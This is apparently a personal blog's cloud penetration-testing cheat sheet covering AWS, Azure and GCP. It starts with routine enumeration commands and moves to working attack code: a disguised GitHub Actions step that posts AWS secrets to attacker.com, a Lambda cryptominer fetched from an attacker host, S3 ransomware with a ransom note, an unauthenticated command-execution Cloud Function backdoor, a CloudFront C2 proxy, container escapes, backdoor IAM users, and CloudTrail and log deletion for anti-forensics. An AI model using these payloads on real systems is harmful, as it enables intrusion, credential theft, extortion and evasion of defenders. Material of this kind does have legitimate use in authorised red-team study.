Skip to main content

Cloud VAPT Notes

3771 words
Edwin | Shiro
Author
Edwin | Shiro
「 ✦ OwO ✦ 」
Table of Contents

Cloud Pentesting & Red Teaming Notes
#


AWS
#

Initial Access & Reconnaissance
#

IAM Login Methods & Configuration
#

Console Access:

  • IAM Login: https://console.aws.amazon.com/
  • SSO Login: https://Org-Name.awsapps.com/start

Programmatic Access (CLI):

# Configure a new CLI profile
aws configure --profile <profile-name>
# You'll be prompted for:
# AWS Access Key ID: [Your Access Key]
# AWS Secret Access Key: [Your Secret Key]
# Default region: [e.g., us-east-1]
# Default output format: [json/text/table]

# Verify configuration and identity
aws sts get-caller-identity --profile <profile-name>
# Returns: Account ID, ARN, and User ID

Credential Storage Locations:

  • Windows: C:\Users\UserName\.aws\
  • Linux/macOS: ~/.aws/
  • Files: credentials (keys), config (profiles/regions)

Core Enumeration Strategy
#

Step 1: Identity Verification

# Always start with this - crucial for understanding your current context
aws sts get-caller-identity --profile <profile-name>

Step 2: IAM Enumeration (Foundation for all attacks)

Users:

# List all users in the account
aws iam list-users --profile <profile-name>

# Get specific user details
aws iam get-user --user-name <user-name> --profile <profile-name>

# Enumerate user's group memberships
aws iam list-groups-for-user --user-name <user-name> --profile <profile-name>

# List policies attached to user (managed policies)
aws iam list-attached-user-policies --user-name <user-name> --profile <profile-name>

# List inline policies for user
aws iam list-user-policies --user-name <user-name> --profile <profile-name>

Groups:

# List all groups
aws iam list-groups --profile <profile-name>

# Get group details and members
aws iam get-group --group-name <group-name> --profile <profile-name>

# List policies attached to group
aws iam list-attached-group-policies --group-name <group-name> --profile <profile-name>
aws iam list-group-policies --group-name <group-name> --profile <profile-name>

Roles (Critical for privilege escalation):

# List all roles - look for assume role opportunities
aws iam list-roles --profile <profile-name>

# Get role trust policy (who can assume this role)
aws iam get-role --role-name <role-name> --profile <profile-name>

# List policies attached to role
aws iam list-attached-role-policies --role-name <role-name> --profile <profile-name>
aws iam list-role-policies --role-name <role-name> --profile <profile-name>

Policy Analysis:

# List all managed policies
aws iam list-policies --profile <profile-name>

# Get policy document (replace version-id with 'v1' for default version)
aws iam get-policy --policy-arn <policy-arn> --profile <profile-name>
aws iam get-policy-version --policy-arn <policy-arn> --version-id <version-id> --profile <profile-name>

# Get inline policy documents
aws iam get-user-policy --user-name <user-name> --policy-name <policy-name> --profile <profile-name>
aws iam get-group-policy --group-name <group-name> --policy-name <policy-name> --profile <profile-name>
aws iam get-role-policy --role-name <role-name> --policy-name <policy-name> --profile <profile-name>

EC2 Instance Metadata Service (IMDS) Exploitation
#

Context: When you compromise a web application running on EC2, you can often access the instance metadata service to retrieve temporary credentials.

IMDSv1 (Legacy - No authentication required):

# First, list available roles
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Then retrieve credentials for the role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

IMDSv2 (Requires token - More secure but still exploitable via SSRF):

# Step 1: Get session token (requires PUT request)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

# Step 2: Use token to access metadata
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Step 3: Get credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

Configure Retrieved Credentials:

# Set up temporary credentials (note the session token requirement)
aws configure set aws_access_key_id <AccessKeyId> --profile ec2-role
aws configure set aws_secret_access_key <SecretAccessKey> --profile ec2-role
aws configure set aws_session_token <Token> --profile ec2-role
aws configure set region <region> --profile ec2-role

# Validate the credentials
aws sts get-caller-identity --profile ec2-role

Service Enumeration
#

EC2 (Virtual Machines):

# List all instances across regions
aws ec2 describe-instances --profile <profile-name>

# Get instances in specific region
aws ec2 describe-instances --region <region> --profile <profile-name>

# List security groups (firewall rules)
aws ec2 describe-security-groups --profile <profile-name>

# List key pairs
aws ec2 describe-key-pairs --profile <profile-name>

S3 (Storage):

# List all buckets
aws s3 ls --profile <profile-name>

# List bucket contents
aws s3 ls s3://<bucket-name> --profile <profile-name>

# Get bucket policy
aws s3api get-bucket-policy --bucket <bucket-name> --profile <profile-name>

# Check for public access
aws s3api get-public-access-block --bucket <bucket-name> --profile <profile-name>

RDS (Databases):

# List RDS instances
aws rds describe-db-instances --profile <profile-name>

# List RDS snapshots
aws rds describe-db-snapshots --profile <profile-name>

Privilege Escalation Techniques
#

1. Policy Attachment Escalation:

# If you have iam:AttachRolePolicy or iam:AttachUserPolicy
# Attach administrative policy to current role/user
aws iam attach-role-policy \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess \
  --role-name <current-role-name> --profile <profile-name>

# Verify escalation
aws iam list-attached-role-policies --role-name <role-name> --profile <profile-name>

2. Policy Version Manipulation:

# If you have iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion
# Get current policy
aws iam get-policy-version --policy-arn <policy-arn> --version-id v1 \
  --query 'PolicyVersion.Document' --profile <profile-name>

# Create malicious policy version (modify JSON to add permissions)
aws iam create-policy-version --policy-arn <policy-arn> \
  --policy-document file://malicious-policy.json --set-as-default \
  --profile <profile-name>

3. Role Assumption Chain:

# If you can assume roles, check trust policies for privilege escalation
aws sts assume-role --role-arn <target-role-arn> \
  --role-session-name <session-name> --profile <profile-name>

# Configure assumed role credentials
aws configure set aws_access_key_id <AccessKeyId> --profile assumed-role
aws configure set aws_secret_access_key <SecretAccessKey> --profile assumed-role
aws configure set aws_session_token <SessionToken> --profile assumed-role

Automated Reconnaissance Tools
#

Pacu (Comprehensive AWS Exploitation Framework):

# Installation
pip3 install pacu
# OR
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu && bash install.sh

# Usage
pacu
(Pacu) > new_session <session-name>
(Pacu) > set_keys  # Configure AWS credentials
(Pacu) > whoami    # Verify current identity

# Set target region(s) for efficiency
(Pacu) > set_regions us-east-1,us-west-2

# Key modules for reconnaissance:
(Pacu) > run iam__enum_permissions  # Map current permissions
(Pacu) > run iam__enum_users_roles_policies_groups  # Full IAM enumeration
(Pacu) > run ec2__enum  # EC2 enumeration
(Pacu) > run s3__bucket_finder  # Find S3 buckets

# Privilege escalation scanning and exploitation
(Pacu) > run iam__privesc_scan  # Identify privilege escalation paths
(Pacu) > run iam__backdoor_users_keys  # Create persistence mechanisms

# Advanced reconnaissance
(Pacu) > run recon__find_admins  # Identify administrative users
(Pacu) > run detection__disruption  # Test detection capabilities

Prowler (AWS Security Assessment):

# Installation
git clone https://github.com/prowler-cloud/prowler
cd prowler
pip install -r requirements.txt

# Usage with AWS credentials
export AWS_PROFILE=<profile-name>
./prowler aws

# Specific compliance checks
./prowler aws --compliance cis_1.5_aws  # CIS benchmark
./prowler aws --compliance gdpr  # GDPR compliance

# Focus on specific services
./prowler aws --services s3,iam,ec2

# Generate reports
./prowler aws --output-formats json,html --output-directory ./reports/

CloudFox (Attack Path Identification):

# Download from https://github.com/BishopFox/cloudfox/releases
chmod +x cloudfox

# Full reconnaissance
./cloudfox aws --profile <profile-name> all-checks

# Specific modules
./cloudfox aws --profile <profile-name> principals  # IAM analysis
./cloudfox aws --profile <profile-name> permissions  # Permission mapping
./cloudfox aws --profile <profile-name> instances    # EC2 analysis
./cloudfox aws --profile <profile-name> buckets      # S3 analysis

# Generate attack paths
./cloudfox aws --profile <profile-name> graph

Persistence Mechanisms
#

1. IAM User Creation:

# If you have iam:CreateUser, iam:CreateAccessKey, iam:AttachUserPolicy
aws iam create-user --user-name backdoor-user --profile <profile-name>
aws iam create-access-key --user-name backdoor-user --profile <profile-name>
aws iam attach-user-policy --user-name backdoor-user \
  --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile <profile-name>

2. Lambda Backdoor:

# Create persistent Lambda function for remote access
# First, create trust policy for Lambda
cat > lambda-trust-policy.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {"Service": "lambda.amazonaws.com"},
      "Action": "sts:AssumeRole"
    }
  ]
}
EOF

# Create role for Lambda
aws iam create-role --role-name lambda-backdoor-role \
  --assume-role-policy-document file://lambda-trust-policy.json \
  --profile <profile-name>

# Attach policy to role
aws iam attach-role-policy --role-name lambda-backdoor-role \
  --policy-arn arn:aws:iam::aws:policy/PowerUserAccess \
  --profile <profile-name>

3. CloudTrail Manipulation:

# Disable logging to hide tracks (if you have cloudtrail:StopLogging)
aws cloudtrail stop-logging --name <trail-name> --profile <profile-name>

# Create event rule to clean up logs
aws logs create-log-group --log-group-name /aws/lambda/log-cleaner \
  --profile <profile-name>

Azure
#

Initial Access & Reconnaissance
#

Authentication Methods & Endpoints
#

Portal URLs:

  • Azure Portal: https://portal.azure.com/
  • M365 Admin: https://admin.microsoft.com
  • M365 User Portal: https://office.com/

API Endpoints:

  • Microsoft Graph: https://graph.microsoft.com/v1.0/ (Identity, M365)
  • Azure Resource Manager: https://management.azure.com/ (Azure resources)

Authentication Tools:

Azure CLI:

# Interactive login
az login

# Service Principal login
az login --service-principal \
  --username <application-id> \
  --password <client-secret> \
  --tenant <tenant-id>

# Verify authentication
az account show
az account list --all

Azure PowerShell:

# Interactive login
Connect-AzAccount

# Service Principal login
$cred = Get-Credential  # Enter Application ID as username, Client Secret as password
Connect-AzAccount -ServicePrincipal -Tenant <tenant-id> -Credential $cred

# Verify authentication
Get-AzContext
Get-AzSubscription

Microsoft Graph PowerShell:

# Install module (if needed)
Install-Module Microsoft.Graph -Force

# Connect with specific scopes
Connect-MgGraph -Scopes "Directory.Read.All", "User.Read.All", "Application.Read.All"

# Verify connection
Get-MgContext

Token-Based Authentication (Post-Compromise)
#

Retrieving and Using Access Tokens:

# Get ARM token
az account get-access-token --resource https://management.azure.com/

# Get Graph token
az account get-access-token --resource https://graph.microsoft.com/

# Use token with PowerShell
$token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."
Connect-AzAccount -AccessToken $token -AccountId <subscription-id>
# Use Graph token
$graphToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."
$secureToken = ConvertTo-SecureString -String $graphToken -AsPlainText -Force
Connect-MgGraph -AccessToken $secureToken

Entra ID (Azure AD) Enumeration
#

Identity Provider Detection:

# Check if organization uses Entra ID
https://login.microsoftonline.com/getuserrealm.srf?login=user@domain.com&xml=1

User Enumeration:

# List all users
Get-MgUser -All

# Get specific user details
Get-MgUser -UserId <user-id> | ConvertTo-Json

# Get user's group memberships
Get-MgUserMemberOf -UserId <user-id>

# Get user's transitive group memberships
Get-MgUserTransitiveMemberOf -UserId <user-id>

# Get user's owned objects
Get-MgUserOwnedObject -UserId <user-id>

Group Analysis:

# List all groups
Get-MgGroup -All

# Get group members
Get-MgGroupMember -GroupId <group-id>

# Get groups with admin privileges
Get-MgDirectoryRole | Where-Object {$_.DisplayName -like "*Admin*"}

Application & Service Principal Enumeration:

# List application registrations
Get-MgApplication -All

# Get app details with sensitive permissions
Get-MgApplication -ApplicationId <app-id> | Select-Object DisplayName, RequiredResourceAccess

# List service principals
Get-MgServicePrincipal -All

# Get service principal permissions
Get-MgServicePrincipal -ServicePrincipalId <sp-id> | Select-Object AppRoles, Oauth2PermissionScopes

# Get application owners (privilege escalation target)
Get-MgApplicationOwner -ApplicationId <app-id>

Directory Role Analysis:

# List all directory roles
Get-MgDirectoryRole

# Get members of privileged roles
$globalAdminRole = Get-MgDirectoryRole -Filter "DisplayName eq 'Global Administrator'"
Get-MgDirectoryRoleMember -DirectoryRoleId $globalAdminRole.Id

Azure Resource Manager Enumeration
#

Subscription Discovery:

# List accessible subscriptions
az account list --all --output table

# Set active subscription
az account set --subscription <subscription-id>

Resource Enumeration:

# List all resource groups
az group list --output table

# List all resources
az resource list --output table

# List VMs with public IPs
az vm list-ip-addresses --output table

# List storage accounts
az storage account list --output table

# List key vaults
az keyvault list --output table

RBAC Analysis:

# List role assignments for current user
az role assignment list --assignee <user-object-id> --all

# List all role assignments in subscription
az role assignment list --all --output table

# List custom roles
az role definition list --custom-role-only --output table

# Get role definition details
az role definition list --name "Contributor"

Azure VM Metadata Service Exploitation
#

Retrieving Managed Identity Tokens:

# Get ARM token from VM metadata service
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Get Graph token
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

# Get Key Vault token
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/"

Using Retrieved Tokens:

# Extract access token from response
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -Headers @{Metadata="true"}
$token = $response.access_token

# Use token with Az PowerShell
Connect-AzAccount -AccessToken $token -AccountId <subscription-id>

Privilege Escalation Techniques
#

1. Application Owner to Global Admin:

# If you own an application, add credentials to it
Add-MgApplicationPassword -ApplicationId <app-object-id>

# If the app's service principal has high privileges, you now control it

2. Directory Role Assignment:

# If you have privilege to assign directory roles
New-MgDirectoryRoleMemberByRef -DirectoryRoleId <role-id> -BodyParameter @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/users/<user-id>"
}

3. Azure Resource Manager Privilege Escalation:

# If you have User Access Administrator role
az role assignment create \
  --assignee <user-object-id> \
  --role "Owner" \
  --scope "/subscriptions/<subscription-id>"

4. Application Permission Escalation:

# If you have Application.ReadWrite.All
# Create new application with high privileges
$app = New-MgApplication -DisplayName "EvilApp" -RequiredResourceAccess @(
    @{
        ResourceAppId = "00000003-0000-0000-c000-000000000000"  # Microsoft Graph
        ResourceAccess = @(
            @{
                Id = "19dbc75e-c2e2-444c-a770-ec69d8559fc7"  # Directory.ReadWrite.All
                Type = "Role"
            }
        )
    }
)

# Create service principal
New-MgServicePrincipal -AppId $app.AppId

Automated Tools
#

AzureHound (BloodHound for Azure):

# Installation
pip3 install azurehound

# Collection
azurehound -u <username> -p <password> -t <tenant-id> list --all

# Generate BloodHound data
azurehound -u <username> -p <password> -t <tenant-id> list --all -o <output-file>

PowerZure (Azure PowerShell Exploitation):

# Installation
Install-Module -Name PowerZure -Force

# Import and authenticate
Import-Module PowerZure
Connect-AzAccount

# Reconnaissance
Get-AzureTargets  # Find interesting resources
Get-AzureRoleMembers  # Find privileged users

MicroBurst (Azure Security Assessment):

# Installation
git clone https://github.com/NetSPI/MicroBurst.git
Import-Module .\MicroBurst.psm1

# Subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base <company-name>

# Blob enumeration
Invoke-EnumerateAzureBlobs -Base <company-name>

GCP
#

Initial Access & Reconnaissance
#

Authentication Methods
#

gcloud CLI Authentication:

# User account login
gcloud auth login

# Service account login
gcloud auth activate-service-account --key-file <service-account-key.json>

# Verify authentication
gcloud auth list
gcloud config list

Credential Storage:

  • Windows: %APPDATA%\gcloud\
  • Linux/macOS: ~/.config/gcloud/
  • Key Files:
    • access_tokens.db: Contains access tokens and expiry info
    • credentials.db: Contains account credentials

Project and Organization Discovery
#

Organization Enumeration:

# List accessible organizations
gcloud organizations list

# Get organization IAM policy
gcloud organizations get-iam-policy <org-id>

Project Enumeration:

# List all accessible projects
gcloud projects list

# Get project IAM policy
gcloud projects get-iam-policy <project-id>

# Set active project
gcloud config set project <project-id>

IAM Enumeration Strategy
#

Service Account Analysis:

# List service accounts in project
gcloud iam service-accounts list

# Get service account IAM policy
gcloud iam service-accounts get-iam-policy <service-account-email>

# List service account keys
gcloud iam service-accounts keys list --iam-account <service-account-email>

# Generate new service account key (if you have permission)
gcloud iam service-accounts keys create key.json --iam-account <service-account-email>

Role Analysis:

# List all predefined roles
gcloud iam roles list --filter="stage:GA" --format="table(name,title)"

# List custom roles for project
gcloud iam roles list --project <project-id>

# Describe specific role
gcloud iam roles describe roles/owner
gcloud iam roles describe <custom-role-id> --project <project-id>

Policy Analysis:

# Get IAM policy for project
gcloud projects get-iam-policy <project-id>

# Filter roles for specific member
gcloud projects get-iam-policy <project-id> \
  --flatten="bindings[].members" \
  --filter="bindings.members:serviceAccount:<email>" \
  --format="value(bindings.role)"

GCP Metadata Service Exploitation
#

Retrieving Access Tokens:

# Get default service account token
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"

# Get specific service account token
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/<email>/token"

# Get available service accounts
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/"

# Get project metadata
curl -H "Metadata-Flavor: Google" \
  "http://169.254.169.254/computeMetadata/v1/project/project-id"

Using Retrieved Tokens:

# Save token for use
echo "ya29.c.Kp8BCAi..." > token.txt

# Use token with gcloud
gcloud auth activate-service-account --key-file token.txt
# OR
gcloud projects list --access-token-file token.txt

Service Enumeration
#

Compute Engine:

# List compute instances
gcloud compute instances list

# List instance groups
gcloud compute instance-groups list

# List firewalls
gcloud compute firewall-rules list

# List networks
gcloud compute networks list

Cloud Storage:

# List storage buckets
gcloud storage ls

# List bucket contents
gcloud storage ls gs://<bucket-name>

# Get bucket IAM policy
gcloud storage buckets get-iam-policy gs://<bucket-name>

# Check for publicly accessible buckets
gsutil iam get gs://<bucket-name>

Cloud SQL:

# List SQL instances
gcloud sql instances list

# Get SQL instance details
gcloud sql instances describe <instance-name>

# List databases
gcloud sql databases list --instance <instance-name>

BigQuery:

# List datasets
bq ls

# List tables in dataset
bq ls <dataset-id>

# Query table (if accessible)
bq query --use_legacy_sql=false 'SELECT * FROM `project.dataset.table` LIMIT 10'

Privilege Escalation Techniques
#

Common High-Risk Permissions:

  • iam.serviceAccounts.actAs - Impersonate service accounts
  • iam.serviceAccountKeys.create - Create new service account keys
  • compute.instances.setMetadata - Modify instance metadata
  • deploymentmanager.deployments.create - Create deployment manager templates

Service Account Impersonation:

# If you have iam.serviceAccounts.actAs
gcloud auth activate-service-account <target-service-account> \
  --key-file <current-key.json>

# Use impersonation flag
gcloud compute instances list --impersonate-service-account <target-service-account>

Deployment Manager Exploitation:

# Create malicious deployment template
cat > evil-deployment.yaml << EOF
resources:
- name: evil-vm
  type: compute.v1.instance
  properties:
    zone: us-central1-a
    machineType: zones/us-central1-a/machineTypes/n1-standard-1
    serviceAccounts:
    - email: <high-privilege-service-account>
      scopes:
      - https://www.googleapis.com/auth/cloud-platform
EOF

# Deploy
gcloud deployment-manager deployments create evil-deployment \
  --config evil-deployment.yaml

Automated Tools
#

CloudFox GCP Module:

# Download CloudFox
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64
chmod +x cloudfox-linux-amd64

# Run full assessment
./cloudfox-linux-amd64 gcp --project <project-id> all-checks

# Specific modules
./cloudfox-linux-amd64 gcp --project <project-id> iam
./cloudfox-linux-amd64 gcp --project <project-id> compute
./cloudfox-linux-amd64 gcp --project <project-id> storage

GCP IAM Privilege Escalation Scanner:

# Installation
git clone https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation.git
cd GCP-IAM-Privilege-Escalation
pip3 install -r requirements.txt

# Enumerate permissions
python3 enumerate_member_permissions.py -p <project-id>

# Check for privilege escalation paths
python3 check_for_privesc.py -p <project-id>

# Exploit specific vulnerabilities (example)
python3 ExploitScripts/iam.serviceAccounts.implicitDelegation.py -p <project-id>

GCPBucketBrute (Storage Enumeration):

# Installation
git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
cd GCPBucketBrute

# Enumerate buckets
python3 gcpbucketbrute.py -k <keywords-file> -w <wordlist>

General Cloud Security Considerations
#

Multi-Cloud Attack Chains
#

Cross-Cloud Credential Reuse:

  • Check for AWS credentials in Azure Key Vault
  • Look for GCP service account keys in AWS S3
  • Search for cloud credentials in GitHub/GitLab repos

Federated Identity Exploitation:

  • SAML assertion manipulation
  • OAuth token hijacking
  • OIDC misconfiguration abuse

Detection Evasion
#

Log Manipulation:

# AWS - Disable CloudTrail
aws cloudtrail stop-logging --name <trail-name>

# Azure - Disable diagnostic settings
az monitor diagnostic-settings delete --name <setting-name> --resource <resource-id>

# GCP - Disable audit logging
gcloud logging sinks delete <sink-name>

Traffic Routing:

  • Use VPC endpoints to avoid internet traffic
  • Leverage cloud NAT gateways
  • Utilize cloud proxy services

Persistence Mechanisms
#

Cross-Cloud Persistence:

  1. Federated SSO Backdoors: Modify SAML configurations
  2. Cross-Account Roles: Create roles that can be assumed from other clouds
  3. Automation Backdoors: Lambda/Functions/Cloud Run with scheduled triggers
  4. Storage-Based Persistence: Hide credentials in object storage

Common Misconfigurations
#

Identity and Access Management:

  • Overprivileged service accounts
  • Wildcard principals in trust policies
  • Missing MFA requirements
  • Excessive API permissions

Network Security:

  • Open security groups (0.0.0.0/0 access)
  • Missing network segmentation
  • Unrestricted outbound access
  • Public database endpoints

Data Protection:

  • Unencrypted storage buckets
  • Public snapshots/backups
  • Misconfigured access policies
  • Missing data classification

Advanced Persistence Techniques
#

AWS Lambda Layers:

# Create malicious layer
zip -r layer.zip python/
aws lambda publish-layer-version --layer-name backdoor-layer \
  --zip-file fileb://layer.zip --compatible-runtimes python3.9

# Attach to existing functions
aws lambda update-function-configuration --function-name <target-function> \
  --layers arn:aws:lambda:region:account:layer:backdoor-layer:1

Azure Automation Runbooks:

# Create persistent runbook
$runbookContent = @"
# Connect using Managed Identity
Connect-AzAccount -Identity
# Your malicious code here
"@

New-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg> \
  -Name "MaintenanceScript" -Type PowerShell -Description "System maintenance"

Import-AzAutomationRunbook -AutomationAccountName <account> -ResourceGroupName <rg> \
  -Name "MaintenanceScript" -Type PowerShell -SourceContent $runbookContent

GCP Cloud Functions:

# Create persistent function
cat > main.py << EOF
import functions_framework
import subprocess

@functions_framework.http
def backdoor(request):
    cmd = request.args.get('cmd', 'whoami')
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout
EOF

# Deploy function
gcloud functions deploy backdoor --runtime python39 --trigger-http \
  --allow-unauthenticated --source .

Container Security
#

Container Escape Techniques:

# Check for privileged containers
docker inspect <container-id> | grep -i privileged

# Mount host filesystem
docker run -v /:/host -it ubuntu:latest chroot /host /bin/bash

# Exploit Docker socket
docker run -v /var/run/docker.sock:/var/run/docker.sock -it docker:latest

Kubernetes Exploitation:

# Check service account permissions
kubectl auth can-i --list

# Pod escape via hostPath
kubectl run escape-pod --image=ubuntu:latest --overrides='
{
  "spec": {
    "hostPID": true,
    "hostNetwork": true,
    "containers": [{
      "name": "escape",
      "image": "ubuntu:latest",
      "command": ["/bin/bash"],
      "stdin": true,
      "tty": true,
      "securityContext": {
        "privileged": true
      },
      "volumeMounts": [{
        "mountPath": "/host",
        "name": "host-root"
      }]
    }],
    "volumes": [{
      "name": "host-root",
      "hostPath": {
        "path": "/"
      }
    }]
  }
}'

# Execute into escaped pod
kubectl exec -it escape-pod -- /bin/bash
chroot /host /bin/bash

Supply Chain Attacks
#

Terraform/IaC Poisoning:

# Malicious Terraform module
resource "aws_iam_user" "backdoor" {
  name = "system-backup-user"
  tags = {
    Purpose = "Automated backups"
  }
}

resource "aws_iam_access_key" "backdoor_key" {
  user = aws_iam_user.backdoor.name
}

resource "aws_iam_user_policy_attachment" "backdoor_policy" {
  user       = aws_iam_user.backdoor.name
  policy_arn = "arn:aws:iam::aws:policy/PowerUserAccess"
}

# Exfiltrate credentials via output
output "backup_access_key" {
  value = aws_iam_access_key.backdoor_key.id
  sensitive = false
}

output "backup_secret_key" {
  value = aws_iam_access_key.backdoor_key.secret
  sensitive = false
}

CI/CD Pipeline Exploitation:

# Malicious GitHub Actions workflow
name: Security Scan
on:
  push:
    branches: [ main ]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    
    - name: Configure AWS credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-region: us-east-1
    
    - name: Security scan
      run: |
        # Exfiltrate AWS credentials
        curl -X POST https://attacker.com/collect \
          -d "aws_key=$AWS_ACCESS_KEY_ID" \
          -d "aws_secret=$AWS_SECRET_ACCESS_KEY"
        
        # Create backdoor
        aws iam create-user --user-name github-scanner
        aws iam create-access-key --user-name github-scanner

Cloud-Native Malware
#

Serverless Cryptominer:

# AWS Lambda cryptominer
import json
import subprocess
import urllib.request

def lambda_handler(event, context):
    # Download and run miner
    miner_url = "https://attacker.com/miner"
    miner_path = "/tmp/miner"
    
    urllib.request.urlretrieve(miner_url, miner_path)
    subprocess.Popen([miner_path, "--pool", "pool.attacker.com:4444"])
    
    return {
        'statusCode': 200,
        'body': json.dumps('Processing complete')
    }

Cloud Storage Ransomware:

# S3 bucket encryption script
import boto3
import os
from cryptography.fernet import Fernet

def encrypt_bucket(bucket_name):
    s3 = boto3.client('s3')
    key = Fernet.generate_key()
    fernet = Fernet(key)
    
    # List all objects
    objects = s3.list_objects_v2(Bucket=bucket_name)
    
    for obj in objects.get('Contents', []):
        # Download object
        response = s3.get_object(Bucket=bucket_name, Key=obj['Key'])
        data = response['Body'].read()
        
        # Encrypt data
        encrypted_data = fernet.encrypt(data)
        
        # Upload encrypted version
        s3.put_object(
            Bucket=bucket_name,
            Key=obj['Key'] + '.encrypted',
            Body=encrypted_data
        )
        
        # Delete original
        s3.delete_object(Bucket=bucket_name, Key=obj['Key'])
    
    # Store decryption key
    s3.put_object(
        Bucket=bucket_name,
        Key='README_DECRYPT.txt',
        Body=f'Your files have been encrypted. Send 1 BTC to recover. Key: {key.decode()}'
    )

Advanced Evasion Techniques
#

API Rate Limit Evasion:

# Distribute requests across regions
for region in us-east-1 us-west-2 eu-west-1; do
    aws ec2 describe-instances --region $region &
done

# Use multiple profiles/accounts
for profile in profile1 profile2 profile3; do
    aws iam list-users --profile $profile &
done

Log Evasion:

# AWS - Use CloudShell to avoid logging source IP
aws cloudshell put-file --source-path ./script.sh --destination-path script.sh
aws cloudshell execute-command --command "bash script.sh"

# Use API Gateway to proxy requests
curl -X POST https://api-gateway-url/prod/proxy \
  -H "Content-Type: application/json" \
  -d '{"service": "iam", "action": "list-users"}'

Traffic Obfuscation:

# Use cloud-native proxies
import boto3
import requests

# Route through CloudFront
def obfuscated_request(url, data):
    # Create CloudFront distribution pointing to C2
    cloudfront = boto3.client('cloudfront')
    
    distribution_config = {
        'CallerReference': 'backdoor-' + str(random.randint(1000, 9999)),
        'Comment': 'CDN for static assets',
        'Origins': {
            'Quantity': 1,
            'Items': [
                {
                    'Id': 'origin1',
                    'DomainName': 'attacker-c2.com',
                    'CustomOriginConfig': {
                        'HTTPPort': 443,
                        'HTTPSPort': 443,
                        'OriginProtocolPolicy': 'https-only'
                    }
                }
            ]
        }
    }
    
    response = cloudfront.create_distribution(DistributionConfig=distribution_config)
    cdn_domain = response['Distribution']['DomainName']
    
    # Use CDN to proxy requests
    return requests.post(f'https://{cdn_domain}/api', data=data)

Incident Response Evasion
#

Anti-Forensics:

# Delete CloudTrail logs
aws logs delete-log-group --log-group-name CloudTrail/audit-logs

# Modify log retention
aws logs put-retention-policy --log-group-name <group> --retention-in-days 1

# Create noise in logs
for i in {1..1000}; do
    aws s3 ls s3://non-existent-bucket-$i 2>/dev/null &
done

Timestamp Manipulation:

# Modify file timestamps in S3
import boto3
from datetime import datetime, timedelta

s3 = boto3.client('s3')

# Backdate object creation
past_date = datetime.now() - timedelta(days=365)
s3.put_object(
    Bucket='target-bucket',
    Key='backdoor.zip',
    Body=malicious_payload,
    Metadata={
        'creation-date': past_date.isoformat()
    }
)

Tool Development Framework
#

Custom Payload Delivery:

#!/usr/bin/env python3
# Multi-cloud payload delivery framework

import boto3
import azure.identity
import google.cloud.storage
import argparse
import base64

class CloudPayloadDelivery:
    def __init__(self):
        self.aws_session = None
        self.azure_credential = None
        self.gcp_client = None
    
    def setup_aws(self, profile=None):
        session = boto3.Session(profile_name=profile)
        self.aws_session = session
        return session.client('sts').get_caller_identity()
    
    def setup_azure(self):
        credential = azure.identity.DefaultAzureCredential()
        self.azure_credential = credential
        return "Azure connection established"
    
    def setup_gcp(self, project_id):
        client = google.cloud.storage.Client(project=project_id)
        self.gcp_client = client
        return f"GCP connection established for {project_id}"
    
    def deploy_aws_lambda(self, function_name, payload):
        lambda_client = self.aws_session.client('lambda')
        
        # Create deployment package
        import zipfile
        import io
        
        zip_buffer = io.BytesIO()
        with zipfile.ZipFile(zip_buffer, 'w') as zip_file:
            zip_file.writestr('lambda_function.py', payload)
        
        # Deploy function
        response = lambda_client.create_function(
            FunctionName=function_name,
            Runtime='python3.9',
            Role='arn:aws:iam::account:role/lambda-execution-role',
            Handler='lambda_function.lambda_handler',
            Code={'ZipFile': zip_buffer.getvalue()},
            Description='Automated security tool'
        )
        return response['FunctionArn']
    
    def deploy_azure_function(self, function_name, payload):
        # Azure Function deployment logic
        pass
    
    def deploy_gcp_function(self, function_name, payload):
        # GCP Cloud Function deployment logic
        pass

# Usage example
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Multi-cloud payload delivery')
    parser.add_argument('--cloud', choices=['aws', 'azure', 'gcp'], required=True)
    parser.add_argument('--payload-file', required=True)
    parser.add_argument('--function-name', required=True)
    
    args = parser.parse_args()
    
    delivery = CloudPayloadDelivery()
    
    with open(args.payload_file, 'r') as f:
        payload = f.read()
    
    if args.cloud == 'aws':
        delivery.setup_aws()
